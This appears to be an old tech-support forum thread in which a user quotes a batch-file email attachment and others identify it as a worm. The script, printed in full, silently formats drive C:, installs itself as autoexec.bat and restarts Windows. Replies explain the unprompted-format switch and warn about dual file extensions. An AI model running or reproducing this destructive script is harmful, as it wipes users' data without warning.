Hi all recently someone sent me this batch file
attached to an email, I did click on it at first,
it started to open a DOS window then I relised
it may cause me problems so I cancel it
FORMAT C: /AUTOTEST
xcopy rightsnet.bat c:\
rename c:\autoexec.bat auto.bat
rename c:\rightsnet.bat autoexec.bat
RUNDLL SHELL32.DLL,SHExitWindowsEx 2

I am just wondering if this could of caused me problems
soon as I seen the format C: message I stopped it
just wondering what its all about.
MB



------------------
MB

If we can't find the answer we keep on trying....never afraid to ask again.

/AUTOTEST Formatting proceeds without further user input or warning messages. As this will also work with hard drives, it is probably advisable to preconfigure the command in a batch file rather than using it directly from the command line. The AUTOTEST switch can be used in conjunction with the /U, /S, and /F switches. It is not compatible with /Q (causing an error message) and /V is ignored.

Then it copies rightsnet.bat to C:, then renames autoexec.bat and then makes rightsnet.bat your new autoexec, and finally, exits windows....

Looks, sounds, smells like a WORM...good thing you stopped it, and a lesson why you shouldn't open attachments unless you are expecting them and know what is in them. It may be a good idea to scan your system with an anti-virus program...the file that it was supposed to copy may still be hanging around.

------------------
mjc
Links list:Computer Links (http://www.dreamwater.org/tech/mjc/index.htm)

Celts are the men that heaven made mad, For all their battles are merry and their songs are all sad.

Wow...

I received an email the other day with a .bat attachment also. Word seems to be out that if the email contains a .txt or a .doc that you're ok to open since there are no executable commands. However, just like that I love you virus out of New Zealand or where ever it originated. The "way to much time on their hands hackers" are doing a dual extension and tricking folks. The one I actually received was a .txt.bat

May all your dealings in life be win/win!

Whyzman

Those are tricky ones. If you have Windows Explorer set to show all files, it will show the dual extension. (View\Folder Options\Advanced tab) If you have it set to hide known file types, or don't have the "show all files" option set, it will only show the first one, .txt or .doc, and not the second one, which is .bat or .exe usually.

That's how I recognized the sircam virus, I ALWAYS set mine to show all files, so I saw the dual extension right away and knew something was not right...you got lucky, many people don't set that option, or don't even know about it. By default Windows hides extensions. MS needs to change that...

------------------
Support the right to keep and arm bears.
Note: Please post your questions on the forums, not in my email.

Computer Information Links (http://www.geocities.com/paleopete/)

Hi Paleo Pete, the guy who sent this batch file has over the past
2 months been sending me emails and I thought I had got to know him
quite well, this is worth pointing out that these guy's seem
to be alright for a few weeks then when they get your trust they send
attachments like this, I am normally very carefull I am the one normally
warning others it just show's how these things can turn out



------------------
MB

If we can't find the answer we keep on trying....never afraid to ask again.

Nay, it's not really your fault. From the command lines you've just listed, it definitely smells like a slimy virus to me. Swapping your autoexec file? That's absolutely not right!

As for your friend, he be innocent actually coz some worms access the victim's address book and forward itself to everyone inside. It might have reached you this way without your friend's knowledge.

Juz a thought: is he using MS Outlook?

Mark,

This dude you were communicating with may not be a "perp." These viri go after your email address book so ones defenses would be down to opening them up. The one I received was from someone I had a business dealing with over a year ago. I recognized the name but was alerted when I saw the dual extension.

As Pete pointed out many will be at risk not knowing that the default is to hide extensions. Many folks will know to stay clear of .exe or .bat, however, the "I love you" virus went after a little known .vbs usuing a dual extension to a .doc if I remember correctly. It would be nice if the ISPs would use filters to advise you of the executable nature of the extensions just as a service to their customers.


May all your dealings in life be win/win!

Whyzman